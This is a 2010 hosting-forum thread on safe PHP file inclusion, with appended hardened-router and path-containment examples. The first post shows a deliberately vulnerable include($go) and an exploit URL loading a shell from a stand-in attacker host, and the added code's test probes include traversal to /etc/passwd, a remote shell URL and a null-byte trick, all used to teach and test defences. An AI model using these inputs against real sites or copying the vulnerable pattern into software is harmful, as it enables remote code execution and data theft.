Nexology Community
Old 06-21-2010, 03:55 AM   #1
HN Top Canine
 
 
Join Date: Jan 2002
Location: The Nexus
Posts: 13,347
PHP Security and YOU - Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

PHP Code:
<?php
include("http://www.myowndomain.com/something.txt");
?>
External:

PHP Code:
<?php
include("http://www.externaldomain.com/something.txt");
?>
Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

PHP Code:
<?php
include('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

PHP Code:
<?php
include("http://www.externaldomain.com/something.txt");
?>
The main problem with include() is that it runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

PHP Code:
<?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "</html>\n";
?>
The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP's readfile() function instead:

PHP: readfile - Manual

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

We'd love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these functions then please do revisit your code and help yourself to secure your data and server.
__________________
Laurence - [HostNexus Administrator]

- Need Support? Quickest responses are found at the Support Helpdesk!
- Stay in touch! Make sure you are subscribed to our Lists.
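The post above shows the `include("$go")` router and says what goes wrong; the following is an added example, not code from the HostNexus post, that puts that vulnerable router next to a hardened one which never hands user input to include(), and adds a helper for remote text that only fetches from an allowlisted host and treats the result as data rather than code. The PAGES and REMOTE_HOSTS tables, the pages/ layout and every file name in it are assumptions made up for the example.

```php
<?php
// Added example (not code from the HostNexus post): the post's vulnerable
// `include("$go")` router beside a hardened version, plus a remote-fetch
// helper. PAGES, REMOTE_HOSTS and the pages/ layout are assumptions.
declare(strict_types=1);

// --- vulnerable, as in the post: the query string decides what is executed ---
function render_vulnerable(string $go): void
{
    // ?go=http://www.hackerdomain.com/shell.txt runs remote PHP when
    // allow_url_include is On; ?go=../../../etc/passwd reads local files
    // regardless of that setting.
    include($go);
}

// --- hardened: a short page name is mapped to a fixed file under a fixed dir ---
const PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function render_page(string $go, string $baseDir): string
{
    // Exact-match allowlist: anything not listed is rejected before any
    // filesystem or network access happens.
    if (!array_key_exists($go, PAGES)) {
        return "404: no such page\n";
    }
    $file = $baseDir . '/' . PAGES[$go];   // server path, never a URL
    ob_start();
    include $file;
    return (string) ob_get_clean();
}

// --- remote content: fetched as data from an allowlisted host, never include()d ---
const REMOTE_HOSTS = ['www.externaldomain.com'];

function fetch_remote_text(string $url): string
{
    $p = parse_url($url);
    if ($p === false
        || ($p['scheme'] ?? '') !== 'https'
        || !in_array($p['host'] ?? '', REMOTE_HOSTS, true)) {
        throw new InvalidArgumentException("refusing to fetch $url");
    }
    $data = @file_get_contents($url);      // needs allow_url_fopen=On
    if ($data === false) {
        throw new RuntimeException("fetch failed: $url");
    }
    // Escape before echoing: PHP never parses this as code, but the browser
    // would still render it as HTML.
    return htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
}

// --- demo: build a throwaway site in a temp dir and exercise the router ---
$base = sys_get_temp_dir() . '/include-demo-' . getmypid();
mkdir($base . '/pages', 0700, true);
file_put_contents($base . '/pages/home.php',  '<?php echo "home page\n";');
file_put_contents($base . '/pages/about.php', '<?php echo "about page\n";');

foreach (['home', 'about', '../../../etc/passwd',
          'http://www.hackerdomain.com/shell.txt'] as $go) {
    echo str_pad($go, 40), ' => ', render_page($go, $base);
}

// The php.ini setting the remote-shell attack depends on (present since PHP 5.2):
echo 'allow_url_include=', ini_get('allow_url_include') ? 'On' : 'Off', "\n";

array_map('unlink', glob($base . '/pages/*'));
rmdir($base . '/pages');
rmdir($base);
```

The allowlist is the whole defence: the traversal string and the remote URL never reach include() because they are not keys in PAGES. Keeping `allow_url_include=Off` (the default) is still worth checking on a shared host, since it closes the remote-code case even for code you have not reviewed yet, but it does nothing against local-file inclusion, which is why the lookup table matters.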
Old 06-28-2010, 02:09 PM   #2
Moderator
 
 
Join Date: Jun 2002
Location: Los Angeles CA
Posts: 7,532
For the root, I usually define it:
define('ROOT', $_SERVER["DOCUMENT_ROOT"]);


and then I use it in an include like this:
include (ROOT."/folder/file.ext");
__________________
Michael Mann
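MikeMann's ROOT constant works as long as the part after ROOT is a fixed literal. The following is an added example, not MikeMann's own code, covering the case where that part comes from the request: the candidate path is canonicalised with realpath() and must land inside ROOT/includes before it is included. The `includes` subdirectory, the `.php`-only rule and the file names in the demo are assumptions made up for the example.

```php
<?php
// Added example, not MikeMann's code: his ROOT constant plus a containment
// check for include paths that are not fixed literals. The 'includes'
// subdirectory and the demo file names are assumptions.
declare(strict_types=1);

// Same definition as in the post; DOCUMENT_ROOT is unset in CLI runs, so the
// demo below passes its own temp root explicitly instead of writing into ROOT.
$demoRoot = sys_get_temp_dir() . '/root-demo-' . getmypid();
define('ROOT', rtrim($_SERVER['DOCUMENT_ROOT'] ?? $demoRoot, '/'));

function safe_include_path(string $relative, string $root = ROOT, string $subdir = 'includes'): string
{
    if (strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('null byte in path');
    }
    $base = realpath($root . '/' . $subdir);
    if ($base === false) {
        throw new RuntimeException("include dir missing: $root/$subdir");
    }
    // realpath() resolves "..", "." and symlinks, and returns false for URLs
    // and for files that do not exist, so http://... never gets past here.
    $candidate = realpath($base . '/' . $relative);
    if ($candidate === false) {
        throw new RuntimeException("no such include: $relative");
    }
    // Compare against the directory plus a trailing separator so that a
    // sibling such as "includes2/x.php" cannot pass as being under "includes".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("escapes include dir: $relative");
    }
    if (pathinfo($candidate, PATHINFO_EXTENSION) !== 'php') {
        throw new RuntimeException("not a .php include: $relative");
    }
    return $candidate;
}

function include_under_root(string $relative, string $root = ROOT): void
{
    include safe_include_path($relative, $root);   // absolute server path only
}

// --- demo: build root/includes plus a file outside it, then probe the check ---
mkdir($demoRoot . '/includes', 0700, true);
file_put_contents($demoRoot . '/includes/header.php', '<?php echo "header ok\n";');
file_put_contents($demoRoot . '/config.php', '<?php echo "SECRET\n";');

$probes = [
    'header.php',                                  // legitimate
    '../config.php',                               // traversal to a sibling of includes/
    '../../../../../../etc/passwd',                // traversal out of the web root
    'http://www.externaldomain.com/shell.txt',     // remote URL
    "header.php\0.txt",                            // null-byte truncation attempt
];
foreach ($probes as $rel) {
    try {
        include_under_root($rel, $demoRoot);
    } catch (Exception $e) {
        echo 'rejected ', json_encode($rel), ': ', $e->getMessage(), "\n";
    }
}

unlink($demoRoot . '/includes/header.php');
unlink($demoRoot . '/config.php');
rmdir($demoRoot . '/includes');
rmdir($demoRoot);
```

Because realpath() follows symlinks, a link inside includes/ that points outside it is rejected too, which is the safe direction; if your layout deliberately symlinks a shared directory into includes/, resolve the base with realpath() on the link target rather than relaxing the prefix check.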
Copyright ©2001 - 2009, HostNexus